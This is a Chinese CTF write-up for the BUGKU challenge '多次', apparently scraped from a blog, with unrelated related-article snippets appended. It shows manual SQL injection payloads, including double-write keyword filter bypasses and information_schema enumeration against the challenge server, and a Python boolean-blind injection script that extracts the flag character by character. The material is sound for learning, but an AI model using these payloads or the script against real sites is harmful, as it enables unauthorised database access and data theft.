Zhu013
Zhu013

BUGKU 多次 手动注入+脚本盲注

本文内容为SQL手动注入步骤+想法,以及盲注脚本。

 http://123.206.87.240:9004/1ndex.php?id=1 

 http://123.206.87.240:9004/1ndex.php?id=1'  报错

 http://123.206.87.240:9004/1ndex.php?id=1'--+ 正常 存在注入

 http://123.206.87.240:9004/1ndex.php?id=1' and 1=1 --+  报错 and被过滤,

 

 http://123.206.87.240:9004/1ndex.php?id=1 ^(length(‘and’)!=0)^‘ 

使用length 判断过滤得出 or union select 被过滤

 

 http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+  正常 双写绕过

 http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+  报错 存在2个库

 http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,2 --+  正常 回显2号位

 

对二号位进行注入

 http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,database()--+ 

数据库名 web1002-1

 http://123.206.87.240:9004/1ndex.php?id=1‘ aandnd 1=2 uunionnion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema = database() --+ 

表名 flag1,hint

 123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name = 'flag1' --+ 

字段 flag1,address

 http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(flag1) from flag1 --+ 

flag1内容为:usOwycTju+FTUUzXosjr 填入发现不对,题目说有两个flag均为小写

 http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,group_concat(address) from flag1 --+ 

address内容为下一关,点击进入下一关地址:http://123.206.87.240:9004/Once_More.php?id=1

 http://123.206.87.240:9004/Once_More.php?id=1'  报错

 http://123.206.87.240:9004/Once_More.php?id=1‘ --+  正常 存在注入

 http://123.206.87.240:9004/Once_More.php?id=1’ order by 2 --+  正常

 http://123.206.87.240:9004/Once_More.php?id=1’ order by 3 --+  报错 存在两个库

 http://123.206.87.240:9004/Once_More.php?id=1‘ ^(length(‘union’)!=0)^’  正常 union被过滤

 http://123.206.87.240:9004/Once_More.php?id=1‘ and 1=2 uunionnion select 1,2 --+  双写无法绕过

 http://123.206.87.240:9004/Once_More.php?id=1’ and 1=2 Union select 1,2 --+  大小写无法绕过

 http://123.206.87.240:9004/Once_More.php?id=1‘ ^(length(‘sleep’)!=0)^’  正常 sleep被过滤 substr也被过滤

由于正确错误返回不同 尝试写脚本Bool盲注

import sys
import requests
from bs4 import BeautifulSoup
import re


url_start = 'http://123.206.87.240:9004/Once_More.php?' 


sqldb ="id=1' and mid(database(),{0},1)='{1}'--+"
sqltb ="id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema = database()),{0},1)='{1}'--+"
sqltest ="id=1' and mid((select group_concat(column_name) from information_schema.columns where table_name ='flag2'),{0},1)='{1}'--+"
sqlflag ="id=1' and mid((select flag2 from flag2),{0},1)='{1}'--+"


def Brup(SQL):
    name=''
    for i in range(1,40):
        for ch in range(32,129):
            if ch == 128:
                sys.exit(0)
            payload = SQL.format(i,chr(ch))
            url_all = url_start+payload
            #print(url_all)
            html = requests.get(url_all)
            soup = BeautifulSoup(html.content, 'html.parser')
            result = soup.find_all(text = 'Hello,I Am Here!')
            #判断列表是否为空
            if len(result):
                name += chr(ch)
                print('name:'+name)
                break
        
if __name__ == '__main__':
    #Brup(sqldb)
    #Brup(sqltb)
    #Brup(sqltest)
    Brup(sqlflag)

#tablename:class,flag2
#注:跑出来为大写,flag全为小写。

 

usOwycTju+FTUUzXosjr

 

 

web1002-1

你可能感兴趣的:(BUGKU 多次 手动注入+脚本盲注)

  • shell经典面试题2 酥暮沐 linux服务器
    1、需求:判断192.168.8.0/24网络中,当前在线的ip有哪些,并编写脚本打印出来。#实际应该是{1..255},下列为实例:foriin{128..135};doping-c1192.168.8.$i&>/dev/nullif[$?-eq0];thenecho"$iisonline..."elseecho"$iisnotexit..."fidone2、设计一个Shell程序,在/user
  • Linux 系统服务开机自启动指导手册 我科绝伦(Huanhuan Zhou) linuxlinux服务器java
    一、引言在Linux系统中,设置服务开机自启动是常见的系统配置任务。本文档详细介绍了多种实现服务开机自启动的方法,包括systemctl方式、通用脚本方式、crontab方案等,并提供了生产环境下的方案建议和开机启动脚本示例。二、systemctl方式2.1适用范围适用于已安装为系统服务且服务文件(.service)存储在/usr/lib/systemd/system的组件。2.2设置开机启动使用
  • 有意思的题目01 老薛爱吃大西瓜 算法c语言学习排序算法数据结构
    数组去重题目:手动输入一个数组(int),长度自定,将数组内容去重,并输出值输入:1232425262输出:13456思路:1.先找到重复数字,能够两两对比的方法,可以进行选择排序2.将重复数字改为标记数字,这里为了方便我选的是0当然,为了避免与数组中值重复,导致出错,可以用stdlib头文件下面的rand()函数获取一个随机值,将其与数组内容对比,没有相等的就作为标记值3.将标记数组后移//创建
  • Day05:C语言学习作业 老薛爱吃大西瓜 c语言学习算法开发语言
    考虑到多重循环对程序效率的影响,以下哪种实现效率较高?为什么?(a)循环次数大的放在外层,循环次数小的放在内层;(b)循环次数小的放在外层,循环次数大的放在内层;答案:循环小的在外层效率高,因为CPU中会对循环次数进行缓存,当循环多后CPU需要进行多次缓存,减少效率请简述以下两个for循环的优缺点。(1)、for(i=0;i#defineN4voidmain(){inti;intx1=1,x2=2
  • 第 9 课 Python 异常处理 嵌入式老牛 Python入门python开发语言
    1.异常与错误程序错误是指语法错误(指令输入不正确)和逻辑错误(程序执行结果不正确),而程序异常是一个意外事件,该事件会在程序执行过程中发生,影响了程序的正常执行,比如:打开的文件不存在、被除数为0、操作的数据类型不对、存储错误,互联网请求错误等等。一般情况下,在Python无法正常处理程序时就会发生一个异常。异常是Python对象,表示一个错误。当Python脚本发生异常时我们需要捕获处理它,否
  • 在friend中让std::make_shared使用private构造函数 GKxx C++学习笔记私有构造函数友元函数智能指针C++
    众所周知在创建std::shared_ptr对象的时候,我们总是应该优先选择std::make_shared而非手动地用new。《EffectiveModernC++》中提到了若干种std::make_shared不奏效的情况,主要是如下几种:make系列函数不支持定制deleter大括号初始化物无法被完美转发由于weak_ptr的存在导致控制块和对象所占的内存被延迟释放在实际操作中,我们还遇到了
  • 安装auto_gptq解决办法 Ven% 简单说深度学习Ubuntu深度学习基础动手人工智能深度学习机器学习python
    这个错误表明在安装auto_gptq包时,生成QiGen内核时失败了。具体来说,setup.py脚本尝试运行一个Python脚本来生成内核,但该脚本不存在或无法访问。以下是一些可能的解决方案:1.确保依赖项已安装首先,确保你已经安装了所有必要的依赖项。你可以尝试以下命令来安装auto_gptq的依赖项:pipinstalltorchtransformers2.使用预编译的二进制文件如果你不需要从源
  • 【漏洞复现】用友-畅捷通T+-Ufida-SQL注入 .Rain. 漏洞复现web安全漏洞复现
    目录0x01产品简介0x02漏洞概述0x03网络测绘0x04漏洞复现0x05Nuclei0x01产品简介用友畅捷通T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。0x02漏洞概述用友畅捷通T+某模块存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语
  • 参加【2025年春季】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽子凯哥 web安全学习安全CTF夺旗赛网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • hive数据操作,导入导出 qzWsong hive
    数据导入导出将数据文件导入hive的表方式1:导入数据的一种方式:手动用hdfs命令,将文件放入表目录;方式2:在hive的交互式shell中用hive命令来导入本地数据到表目录hive>loaddatalocalinpath'/root/order.data.2'intotablet_order;方式3:用hive命令导入hdfs中的数据文件到表目录hive>loaddatainpath'/ac
  • python调用tensorflow模型_python下tensorflow模型的导出 weixin_39663602
    一基本流程1.python脚本中定义自己的模型,训练完成后将tensorflowgraph定位导出为protobuf的二进制文件或者文本文件(一个仅有tensor定义但是不含有权重参数的文件);2.python脚本训练过程保存模型参数文件*.ckpt;3.调用tensorflow自带的freeze_graph.py小工具,输入格式为*.pb活在*.pbtxt的protobuf文件和*.ckpt的参
  • WiFi唤醒(Wake on Wireless)功能配置方法 好多渔鱼好多 wifi驱动移植与调试网络电视盒子智能电视电视p2p
    目录一、简介二、硬件要求1.怎样查看硬件是否支持1.1查看硬件规格书或者查阅官方文档或询问厂家技术支持确认是否支持。1.2.使用ethtool工具来查询和配置网络接口的唤醒设置。1.3.手动进行测试。2.具体硬件要求(以RealTekwifi模组为例进行说明)2.1带内(In-bandrequirements)SDIOInterfaceUSBInterfacePCIInterface2.2带外(O
  • SpringBoot为什么要禁止循环依赖? java1234_小锋 javajava开发语言
    大家好,我是锋哥。今天分享关于【SpringBoot为什么要禁止循环依赖?】面试题。希望对大家有帮助;SpringBoot为什么要禁止循环依赖?1000道互联网大厂Java工程师精选面试题-Java资源分享网SpringBoot禁止循环依赖的原因与Spring框架本身的设计和依赖注入机制密切相关。以下是详细解释:1.依赖注入的基本原理在Spring框架中,依赖注入(DependencyInject
  • 三个地面基站,根据距离计算空间目标的三维坐标,MATLAB代码,订阅后可查看完整代码 MATLAB卡尔曼 MATLAB定位程序与详解matlab开发语言
    三个地面基站,根据距离计算地上目标的三维坐标,给出MATLAB求解方法,订阅专栏后,可以查看完整源代码,复制粘贴到MATLAB空脚本中即可直接运行引言要根据三个平面上的基站计算空间中某一点的坐标,通常可以使用三角测量的方法。假设有三个已知基站位置(A)、(B)和(C),以及它们到待测点(P)的距离(d_A)、(d_B)和(d_C)。仿真设置基站位置基站(A(x_A,y_A,z_A))基站(B(x_
  • 万字长文2024最全Go面经汇总 go后端面试问题
    本文主要是分享真实的面经,关于这些问题的详解,我们只整理了一部分,文末有他们的详解跳转链接,如果需要可以点进去看看。对于我们没有整理的面经详解,我建议大家可以使用AI,基于这些真实的面经去获取对应的答案。如果你需要更多的面经,也可以私信我联系我。腾讯一面协程池的作用?内存逃逸分析?go的内存回收什么条件会触发?go的GC能够手动触发吗?channel的底层实现?有缓冲的,无缓冲的channel,如
  • 分享一款好用的四合一缩略图生成在线工具 Java潘老师 在线工具缩略图
    今天,我们要介绍一款能够极大提升网页设计和测试效率的工具——3M万能在线工具箱中的“四合一网页设备缩略图”生成工具。为什么需要四合一缩略图生成在线工具?在网页设计和开发过程中,确保网页在不同设备上(如台式机、笔记本电脑、平板电脑和手机)都能完美显示是至关重要的。然而,手动测试网页在每种设备上的显示效果不仅耗时,而且容易遗漏细节。此外,对于设计师和开发者来说,快速生成网页在多种设备上的预览图,可以帮
  • 如何通过减少HTTP请求来提升页面加载速度? 破碎的天堂鸟 学习教程http网络协议网络
    通过减少HTTP请求可以显著提升网页加载速度,这是因为HTTP请求的次数直接影响了页面加载时间。以下是一些具体的方法和策略:1.合并文件将多个CSS文件合并为一个CSS文件,将多个JavaScript文件合并为一个JavaScript文件。这可以减少浏览器发起的HTTP请求次数,从而加快页面加载速度。示例:将所有样式表和脚本文件打包成一个文件,以减少请求数量。2.使用CSSSprites(雪碧图)
  • 商用车电子电气零部件电磁兼容条件和试验(20)—高压大电流注入传导抗干扰(HV-BCI) 零零刷 电磁兼容(EMC)试验汽车可用性测试压力测试功能测试安全性测试安全社交电子
    写在前面本系列文章主要讲解商用车电子/电气零部件或系统的传导抗干扰、传导发射和辐射抗干扰、电场辐射发射以及静电放电等试验内容及要求,高压试验项目内容及要求。若有相关问题,欢迎评论沟通,共同进步。(*^▽^*)目录商用车电子电气零部件电磁兼容条件和试验—目录-CSDN博客10.高压零部件试验项目10.9高压大电流注入传导抗干扰(HV-BCI)10.9.1参考标准本部分参考ISO11452-4标准制定
  • 前端开发是随着互联网的发展而逐渐兴起的一种新的开发领域。它一直在不断地发展和演变,经历了许多重要的里程碑事件和技术革新,下面就来回顾一下前端开发的历程和发展趋势。 21级应用技术UI3班何珍锋 前端javascript前端框架
    一、Web1.0时代1990年代末到2000年代初,Web1.0时代是Web发展的初期阶段,这个阶段的Web界面设计以简单的文本和图像为主,用户的互动性和用户体验都很低。在这个时代,浏览器的前端技术主要是基于HTML和CSS的,HTML指的是超文本标记语言,而CSS则指的是层叠样式表。由于这些技术的简单性,前端开发者往往需要手动编写HTML和CSS代码,并进行基本的样式设计。二、Web2.0时代随
  • 驾驭MySQL性能优化利器:八大工具助您告别低效SQL 墨瑾轩 一起学学数据库【一】mysql性能优化sql
    已列出工具的使用说明:1.mysqltuner.pl安装与使用:下载最新版本的mysqltuner.pl脚本(通常通过wget或curl命令获取)。为脚本赋予执行权限(chmod+xmysqltuner.pl)。运行脚本,提供MySQL服务器的用户名、密码以及端口号(如有必要)。示例:Code./mysqltuner.pl--user=root--password=your_password--h
  • Facebook 隐私变革之路:回顾与展望 ClonBrowser Facebookfacebook隐私保护人工智能数据安全
    在数字时代,个人隐私的保护一直是社交平台面临的重大挑战之一。作为全球最大的社交网络平台,Facebook(现为Meta)在处理用户隐私方面的变革,历经了多次调整与完善。本文将回顾Facebook在隐私保护方面的历程,并展望其未来在隐私保护方面的发展方向。隐私争议的起点Facebook的隐私变革之路始于其早期的隐私政策。最初,Facebook的隐私设置较为宽松,用户的个人数据常常被分享给广告商或第三
  • MATLAB 代码的主要功能是基于功能连接(FC)数据,利用支持向量机(SVM)进行分类,并通过留一法交叉验证、特征选择、超参数寻优、一致性特征分析以及置换检验等步骤,评估分类性能和特征的显著性 max500600 MATLAB开发语言算法matlab支持向量机分类
    clear;clcNumROI=37;%ROI数目NumCon=605;%连接数目%选择病人组数据文件夹%path1=spm_select(1,'dir','pleaseselectpatientsdir');path1='D:\siying\42ML_day3\nnnnnn\FC\Patient';%和第7行用一个即可,为手动改路径file1=dir([path1,filesep,'*.txt'
  • linux下使用脚本实现对进程的内存占用自动化监测 浪小满 常用问题解决linux自动化运维内存占用情况监测
    linux系统中常用cat/proc/{pid}/status和pmap-x{pid}来监测某个进程的内存资源占用情况。其中注意各参数的含义如下:VmSize:表示进程当前虚拟内存大小VmPeak:表示进程所占用最大虚拟内存大小VmRSS:表示进程当前占用物理内存的大小(与procrank中的RSS,pmap中的RSS一样)VmLck:表示被锁定的内存大小VmHWM:表示进程所占用物理内存的峰值V
  • 使用 Rebuff 检测和防御 Prompt Injection 攻击 azzxcvhj promptpython
    技术背景介绍随着生成式AI的逐渐普及,PromptInjection(PI)攻击逐渐成为一种严重的安全威胁。这种攻击方式利用模型对输入过度信赖的特性,精心设计输入内容,以误导AI系统执行不当的操作。例如,攻击者可以注入恶意SQL语句或绕过原有的逻辑规则,给系统安全带来极大隐患。本文将重点介绍开源工具Rebuff,它是一种自硬化的PromptInjection检测系统,旨在通过多层次防御机制保护AI
  • MasterSAM downloadService任意文件读取(CVE-2024-55457)(附脚本) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:MasterSAM是一款专注于身份管理和单点登录(SSO)的企业级软件,主要用于集中管理用户账户、权限和访问控制。它支持单点登录功能
  • 潇洒郎: Python获取设备已连接的所有WIFi账号和密码 潇洒郎 Python学习pythonWiFi账号和密码
    Python获取设备已连接的所有WIFi账号和密码如果你忘记了密码,可以使用这个脚本获取,不要使用非法用途哦!#coding=utf8#User:Administrator#Date:2024/11/5#Time:13:02importsubprocessimportjsondefsub_cmd(cmd):res=subprocess.getoutput(cmd)returnresdefget_a
  • 大模型管理工具:Ollama m0_37559973 大模型Ollama大模型管理工具
    目录一、Ollama介绍二、Linux安装Ollama2.1一键安装2.2手动安装三、使用Ollama3.1配置模型下载路径3.2运行模型3.3常用命令四、模型管理4.1官方模型库4.2导入自定义模型五、RESTAPI六、WebUI一、Ollama介绍Ollama是一个基于Go语言开发的可以本地运行大模型的开源框架,同时提供RESTAPI管理和使用大模型。二、Linux安装Ollama2.1一键安
  • GitHub 汉化插件,GitHub 中文化界面安装全教程 脚大江山稳 github汉化js浏览器脚本
    概述GitHub作为全球最大的代码托管平台,拥有庞大的用户群体。对于中文用户来说,如果能将GitHub界面汉化,将大大提高使用体验和工作效率。本文将详细介绍如何通过安装汉化插件,实现GitHub界面的中文化。感谢maboloshi作者的无私奉献.GitHub汉化插件,GitHub中文化界面安装全教程1.打开github网址2.安装浏览器对应的脚本管理器3.安装用户脚本管理器4.点击安装5.安装成功
  • C#委托和事件的区别 犯罪刚回来 VisualStudiounity3dc#开发语言
    一、概念1、委托:将方法以变量的形式传递,并且以方法的形式执行。他是类,是引用类型。2、事件:功能被限制的一个委托变量。它的类型是委托类型。3、委托的三种形式3.1、delegate:四步(声明,实例化,注册方法,调用)3.2、Action:添加的方法不能有返回值3.3、Func:添加的方法要有返回值3.4、lamda表达式:方法只使用一次,没有多次使用的话使用二、案例1、委托、匿名函数、lamd
  • GitHub Actions 使用需谨慎:深度剖析其痛点与替代方案 敖行客 Allthinker github
    在持续集成与持续部署(CI/CD)领域,GitHubActions曾是众多开发者的热门选择,但如今,其弊端逐渐显现,让不少人在使用前不得不深思熟虑。团队由大约15名工程师组成,采用基于主干的开发方式,每天多次向主分支推送代码。团队代码存储在按模块划分的单一代码库(monorepo)中,结构如下:monorepo/├─api1/├─api2/├─web-app1/├─web-app2/每个文件夹都相
  • java工厂模式 3213213333332132 java抽象工厂
    工厂模式有 1、工厂方法 2、抽象工厂方法。 下面我的实现是抽象工厂方法, 给所有具体的产品类定一个通用的接口。 package 工厂模式; /** * 航天飞行接口 * * @Description * @author FuJianyong * 2015-7-14下午02:42:05 */ public interface SpaceF
  • nginx频率限制+python测试 ronin47 nginx 频率 python
           部分内容参考:http://www.abc3210.com/2013/web_04/82.shtml 首先说一下遇到这个问题是因为网站被攻击,阿里云报警,想到要限制一下访问频率,而不是限制ip(限制ip的方案稍后给出)。nginx连接资源被吃空返回状态码是502,添加本方案限制后返回599,与正常状态码区别开。步骤如下:
  • java线程和线程池的使用 dyy_gusi ThreadPoolthreadRunnabletimer
    java线程和线程池 一、创建多线程的方式     java多线程很常见,如何使用多线程,如何创建线程,java中有两种方式,第一种是让自己的类实现Runnable接口,第二种是让自己的类继承Thread类。其实Thread类自己也是实现了Runnable接口。具体使用实例如下: 1、通过实现Runnable接口方式 1 2
  • Linux 171815164 linux
    ubuntu kernel http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.1.2-unstable/ 安卓sdk代理 mirrors.neusoft.edu.cn        80 输入法和jdk sudo apt-get install fcitx su
  • Tomcat JDBC Connection Pool g21121 Connection
           Tomcat7 抛弃了以往的DBCP 采用了新的Tomcat Jdbc Pool 作为数据库连接组件,事实上DBCP已经被Hibernate 所抛弃,因为他存在很多问题,诸如:更新缓慢,bug较多,编译问题,代码复杂等等。        Tomcat Jdbc P
  • 敲代码的一点想法 永夜-极光 java随笔感想
                  入门学习java编程已经半年了,一路敲代码下来,现在也才1w+行代码量,也就菜鸟水准吧,但是在整个学习过程中,我一直在想,为什么很多培训老师,网上的文章都是要我们背一些代码?比如学习Arraylist的时候,教师就让我们先参考源代码写一遍,然
  • jvm指令集 程序员是怎么炼成的 jvm 指令集
    转自:http://blog.csdn.net/hudashi/article/details/7062675#comments       将值推送至栈顶时 const ldc  push   load指令 const系列 该系列命令主要负责把简单的数值类型送到栈顶。(从常量池或者局部变量push到栈顶时均使用) 0x02 &nbs
  • Oracle字符集的查看查询和Oracle字符集的设置修改 aijuans oracle
    本文主要讨论以下几个部分:如何查看查询oracle字符集、 修改设置字符集以及常见的oracle utf8字符集和oracle exp 字符集问题。 一、什么是Oracle字符集 Oracle字符集是一个字节数据的解释的符号集合,有大小之分,有相互的包容关系。ORACLE 支持国家语言的体系结构允许你使用本地化语言来存储,处理,检索数据。它使数据库工具,错误消息,排序次序,日期,时间,货
  • png在Ie6下透明度处理方法 antonyup_2006 css浏览器FirebugIE
    由于之前到深圳现场支撑上线,当时为了解决个控件下载,我机器上的IE8老报个错,不得以把ie8卸载掉,换个Ie6,问题解决了,今天出差回来,用ie6登入另一个正在开发的系统,遇到了Png图片的问题,当然升级到ie8(ie8自带的开发人员工具调试前端页面JS之类的还是比较方便的,和FireBug一样,呵呵),这个问题就解决了,但稍微做了下这个问题的处理。 我们知道PNG是图像文件存储格式,查询资
  • 表查询常用命令高级查询方法(二) 百合不是茶 oracle分页查询分组查询联合查询
    ----------------------------------------------------分组查询 group by    having   --平均工资和最高工资   select avg(sal)平均工资,max(sal)  from emp ;  --每个部门的平均工资和最高工资
  • uploadify3.1版本参数使用详解 bijian1013 JavaScriptuploadify3.1
    使用:     绑定的界面元素<input id='gallery'type='file'/>$("#gallery").uploadify({设置参数,参数如下}); 设置的属性: id: jQuery(this).attr('id'),//绑定的input的ID langFile: 'http://ww
  • 精通Oracle10编程SQL(17)使用ORACLE系统包 bijian1013 oracle数据库plsql
    /* *使用ORACLE系统包 */ --1.DBMS_OUTPUT --ENABLE:用于激活过程PUT,PUT_LINE,NEW_LINE,GET_LINE和GET_LINES的调用 --语法:DBMS_OUTPUT.enable(buffer_size in integer default 20000); --DISABLE:用于禁止对过程PUT,PUT_LINE,NEW
  • 【JVM一】JVM垃圾回收日志 bit1129 垃圾回收
    将JVM垃圾回收的日志记录下来,对于分析垃圾回收的运行状态,进而调整内存分配(年轻代,老年代,永久代的内存分配)等是很有意义的。JVM与垃圾回收日志相关的参数包括: -XX:+PrintGC -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -Xloggc -XX:+PrintGC 通
  • Toast使用 白糖_ toast
    Android中的Toast是一种简易的消息提示框,toast提示框不能被用户点击,toast会根据用户设置的显示时间后自动消失。     创建Toast 两个方法创建Toast makeText(Context context, int resId, int duration)     参数:context是toast显示在
  • angular.identity boyitech AngularJSAngularJS API
    angular.identiy 描述: 返回它第一参数的函数. 此函数多用于函数是编程. 使用方法: angular.identity(value); 参数详解: Param Type Details value * to be returned. 返回值: 传入的value 实例代码: <!DOCTYPE HTML>
  • java-两整数相除,求循环节 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class CircleDigitsInDivision { /** * 题目:求循环节,若整除则返回NULL,否则返回char*指向循环节。先写思路。函数原型:char*get_circle_digits(unsigned k,unsigned j)
  • Java 日期 周 年 Chen.H javaC++cC#
    /** * java日期操作(月末、周末等的日期操作) * * @author * */ public class DateUtil { /** */ /** * 取得某天相加(减)後的那一天 * * @param date * @param num *
  • [高考与专业]欢迎广大高中毕业生加入自动控制与计算机应用专业 comsci 计算机
          不知道现在的高校还设置这个宽口径专业没有,自动控制与计算机应用专业,我就是这个专业毕业的,这个专业的课程非常多,既要学习自动控制方面的课程,也要学习计算机专业的课程,对数学也要求比较高.....如果有这个专业,欢迎大家报考...毕业出来之后,就业的途径非常广.....      以后
  • 分层查询(Hierarchical Queries) daizj oracle递归查询层次查询
    Hierarchical Queries If a table contains hierarchical data, then you can select rows in a hierarchical order using the hierarchical query clause: hierarchical_query_clause::= start with condi
  • 数据迁移 daysinsun 数据迁移
    最近公司在重构一个医疗系统,原来的系统是两个.Net系统,现需要重构到java中。数据库分别为SQL Server和Mysql,现需要将数据库统一为Hana数据库,发现了几个问题,但最后通过努力都解决了。 1、原本通过Hana的数据迁移工具把数据是可以迁移过去的,在MySQl里面的字段为TEXT类型的到Hana里面就存储不了了,最后不得不更改为clob。 2、在数据插入的时候有些字段特别长
  • C语言学习二进制的表示示例 dcj3sjt126com cbasic
    进制的表示示例 # include <stdio.h> int main(void) { int i = 0x32C; printf("i = %d\n", i); /* printf的用法 %d表示以十进制输出 %x或%X表示以十六进制的输出 %o表示以八进制输出 */ return 0; }
  • NsTimer 和 UITableViewCell 之间的控制 dcj3sjt126com ios
    情况是这样的: 一个UITableView, 每个Cell的内容是我自定义的 viewA viewA上面有很多的动画, 我需要添加NSTimer来做动画, 由于TableView的复用机制, 我添加的动画会不断开启, 没有停止, 动画会执行越来越多.   解决办法: 在配置cell的时候开始动画, 然后在cell结束显示的时候停止动画   查找cell结束显示的代理
  • MySql中case when then 的使用 fanxiaolong casewhenthenend
    select "主键", "项目编号", "项目名称","项目创建时间", "项目状态","部门名称","创建人" union (select pp.id as "主键", pp.project_number as &
  • Ehcache(01)——简介、基本操作 234390216 cacheehcache简介CacheManagercrud
    Ehcache简介 目录 1       CacheManager 1.1      构造方法构建 1.2      静态方法构建 2       Cache 2.1&
  • 最容易懂的javascript闭包学习入门 jackyrong JavaScript
    http://www.ruanyifeng.com/blog/2009/08/learning_javascript_closures.html 闭包(closure)是Javascript语言的一个难点,也是它的特色,很多高级应用都要依靠闭包实现。 下面就是我的学习笔记,对于Javascript初学者应该是很有用的。 一、变量的作用域 要理解闭包,首先必须理解Javascript特殊
  • 提升网站转化率的四步优化方案 php教程分享 数据结构PHP数据挖掘Google活动
    网站开发完成后,我们在进行网站优化最关键的问题就是如何提高整体的转化率,这也是营销策略里最最重要的方面之一,并且也是网站综合运营实例的结果。文中分享了四大优化策略:调查、研究、优化、评估,这四大策略可以很好地帮助用户设计出高效的优化方案。 PHP开发的网站优化一个网站最关键和棘手的是,如何提高整体的转化率,这是任何营销策略里最重要的方面之一,而提升网站转化率是网站综合运营实力的结果。今天,我就分
  • web开发里什么是HTML5的WebSocket? naruto1990 Webhtml5浏览器socket
    当前火起来的HTML5语言里面,很多学者们都还没有完全了解这语言的效果情况,我最喜欢的Web开发技术就是正迅速变得流行的 WebSocket API。WebSocket 提供了一个受欢迎的技术,以替代我们过去几年一直在用的Ajax技术。这个新的API提供了一个方法,从客户端使用简单的语法有效地推动消息到服务器。让我们看一看6个HTML5教程介绍里 的 WebSocket API:它可用于客户端、服
  • Socket初步编程——简单实现群聊 Everyday都不同 socket网络编程初步认识
    初次接触到socket网络编程,也参考了网络上众前辈的文章。尝试自己也写了一下,记录下过程吧:   服务端:(接收客户端消息并把它们打印出来)   public class SocketServer { private List<Socket> socketList = new ArrayList<Socket>(); public s
  • 面试:Hashtable与HashMap的区别(结合线程) toknowme
    昨天去了某钱公司面试,面试过程中被问道 Hashtable与HashMap的区别?当时就是回答了一点,Hashtable是线程安全的,HashMap是线程不安全的,说白了,就是Hashtable是的同步的,HashMap不是同步的,需要额外的处理一下。   今天就动手写了一个例子,直接看代码吧 package com.learn.lesson001; import java
  • MVC设计模式的总结 xp9802 设计模式mvc框架IOC
    随着Web应用的商业逻辑包含逐渐复杂的公式分析计算、决策支持等,使客户机越 来越不堪重负,因此将系统的商业分离出来。单独形成一部分,这样三层结构产生了。 其中‘层’是逻辑上的划分。 三层体系结构是将整个系统划分为如图2.1所示的结构[3] (1)表现层(Presentation layer):包含表示代码、用户交互GUI、数据验证。 该层用于向客户端用户提供GUI交互,它允许用户
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他